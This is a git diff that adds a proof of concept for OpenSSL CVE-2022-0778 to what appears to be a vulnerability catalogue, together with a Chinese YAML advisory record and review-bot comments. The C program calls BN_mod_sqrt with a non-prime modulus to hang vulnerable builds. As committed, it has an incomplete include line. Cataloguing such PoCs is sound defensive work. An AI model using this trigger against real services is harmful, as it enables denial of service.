diff --git a/cve/openssl/2022/CVE-2022-0778/README.md b/cve/openssl/2022/CVE-2022-0778/README.md new file mode 100644 index 0000000000000000000000000000000000000000..58c70fbb6bed739fbb86ac7146661d13e525af74 --- /dev/null +++ b/cve/openssl/2022/CVE-2022-0778/README.md @@ -0,0 +1,6 @@ + +The prerequisite is having installed gcc and a vulnerable version of OpenSSL. + +POC of BN_mod_sqrt(): compile with gcc -o bad_BN bad_BN.c -lcrypto, run ./bad_BN + +REF: https://github.com/drago-96/CVE-2022-0778 \ No newline at end of file diff --git a/cve/openssl/2022/CVE-2022-0778/bad_BN.c b/cve/openssl/2022/CVE-2022-0778/bad_BN.c new file mode 100644 index 0000000000000000000000000000000000000000..34247ac8cd5324e2a1c58716edef597ea22d521e --- /dev/null +++ b/cve/openssl/2022/CVE-2022-0778/bad_BN.c @@ -0,0 +1,22 @@ +#include + + +int main() { + BN_CTX *ctx; + ctx = BN_CTX_new(); + BIGNUM *res, *a, *p; + res = BN_CTX_get(ctx); + a = BN_CTX_get(ctx); + p = BN_CTX_get(ctx); + + BN_dec2bn(&p, "697"); + BN_dec2bn(&a, "696"); + + printf("p = %s\n", BN_bn2dec(p)); + printf("a = %s\n", BN_bn2dec(a)); + + BIGNUM* check = BN_mod_sqrt(res, a, p, ctx); + printf("%s\n", BN_bn2dec(res)); + + return 0; +} \ No newline at end of file diff --git a/cve/openssl/2022/yaml/CVE-2022-0778.yaml b/cve/openssl/2022/yaml/CVE-2022-0778.yaml new file mode 100644 index 0000000000000000000000000000000000000000..b571f37cd324800e25bed4ca326626b6313d28bc --- /dev/null +++ b/cve/openssl/2022/yaml/CVE-2022-0778.yaml 
@@ -0,0 +1,17 @@ +id: CVE-2022-0778 +source: https://github.com/drago-96/CVE-2022-0778 +info: + name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 + severity: High + description: 漏洞出自BN_mod_sqrt()接口函数,它用于计算模平方根,且期望参数p应该是个质数,但是函数内并没有进行检查,这导致内部可能出现无限循环。 + scope-of-influence: Openssl 1.0.2, 1.1.1 和 3.0 版本 + reference: + - https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2022-0778 + cwe-id: CWE-835 + cnvd-id: None + kve-id: None + tags: 不可达退出条件的循环(无限循环) \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index f822acc2b69f179a6e97f17564d06e258e4fe60d..f5862bafe457419f5bac3cee918a19b6a983d397 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -56,6 +56,7 @@ cve: - CVE-2022-2274 - CVE-2022-3602 - CVE-2023-25136 + - CVE-2022-0778 libxml2: - CVE-2020-24977 - CVE-2021-3517
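Review bot: The README for CVE-2022-0778 gives build and run instructions but never says what the reader should observe, so the PoC cannot be used as a pass/fail check; add one line stating that on a vulnerable OpenSSL the call to BN_mod_sqrt() never returns (the process spins at 100% CPU, matching the "infinite loop" described in the yaml), while on a fixed build the program exits promptly. Naming the affected versions here (1.0.2, 1.1.1 and 3.0, as the yaml already states) would also save the reader a lookup, and the file should end with a newline.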
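Review bot: bad_BN.c will not compile as committed: the only include line reads `#include` with no header, yet the code uses printf() and the BIGNUM API, so it needs `#include <stdio.h>` and `#include <openssl/bn.h>`. Beyond that, the result of BN_mod_sqrt() is stored in `check` and never examined; since a patched OpenSSL returns NULL for a non-prime modulus like 697, the PoC should test `check == NULL` and print a clear "not vulnerable" message instead of unconditionally printing `res`. Minor points: BN_CTX_get() is documented to be used after BN_CTX_start() (with a matching BN_CTX_end()), every BN_bn2dec() string should be released with OPENSSL_free(), and `ctx` is never freed with BN_CTX_free().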
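Review bot: In CVE-2022-0778.yaml the `name` field holds a paragraph-length product description rather than a name; move that text into `description` (or a separate field) and keep `name` short so the record matches the other entries in the repository. The `reference` list carries only a Siemens ProductCERT PDF; the upstream OpenSSL security advisory for this CVE is the primary source and should be listed first. The `cnvd-id: None` and `kve-id: None` values will be read as the string "None" by YAML parsers, so use an empty value or `null` if "not assigned" is intended, and end the file with a newline.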
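Review bot: In openkylin_list.yaml the new `- CVE-2022-0778` entry is appended after `- CVE-2023-25136`, breaking the ascending order the surrounding entries follow (CVE-2022-2274, CVE-2022-3602, CVE-2023-25136); insert it before `- CVE-2022-2274` so the list stays sorted and future merges do not conflict on the tail of the block.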